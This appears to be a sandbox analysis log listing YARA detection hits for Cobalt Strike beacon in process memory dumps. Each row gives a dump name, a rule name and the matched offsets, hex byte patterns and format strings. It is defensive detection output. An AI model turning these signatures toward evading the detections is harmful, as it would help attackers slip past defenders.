00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2d650:$a39: %s as %s\%s: %d 0x3c902:$a41: beacon.x64.dll 0x2e860:$a46: %s (admin) 0x2d7b0:$a48: %s%s: %s 0x2d67c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2d6a8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2e8a9:$a51: Content-Length: %d
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x19ee8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3cc6b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x177c2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18a73:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x186a3:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x17a46:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4662:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x326e5:$a39: %s as %s\%s: %d 0x41500:$a41: beacon.x64.dll 0x338ee:$a46: %s (admin) 0x32845:$a48: %s%s: %s 0x32711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3273d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x33937:$a51: Content-Length: %d
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1f0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4169b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1c98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1dc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1d86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1cc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x326e5:$a39: %s as %s\%s: %d 0x41500:$a41: beacon.x64.dll 0x338ee:$a46: %s (admin) 0x32845:$a48: %s%s: %s 0x32711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3273d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x33937:$a51: Content-Length: %d
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1f0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4169b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1c98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1dc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1d86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1cc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x496e5:$a39: %s as %s\%s: %d 0x58500:$a41: beacon.x64.dll 0x4a8ee:$a46: %s (admin) 0x49845:$a48: %s%s: %s 0x49711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x4973d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x4a937:$a51: Content-Length: %d
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x360b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x5869b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x3398b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x34c3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x3486c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x33c0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x336e5:$a39: %s as %s\%s: %d 0x42500:$a41: beacon.x64.dll 0x348ee:$a46: %s (admin) 0x33845:$a48: %s%s: %s 0x33711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3373d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x34937:$a51: Content-Length: %d
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x200b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4269b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1d98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1ec3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1e86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1dc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009284243.00000215D77F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a136:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17a10:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18cc1:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2007898810.00000215D7757000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x188f1:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x17c94:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4662:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0xd769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x17769:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x336e5:$a39: %s as %s\%s: %d 0x42500:$a41: beacon.x64.dll 0x348ee:$a46: %s (admin) 0x33845:$a48: %s%s: %s 0x33711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3373d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x34937:$a51: Content-Length: %d
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x200b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4269b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1d98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1ec3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1e86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1dc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
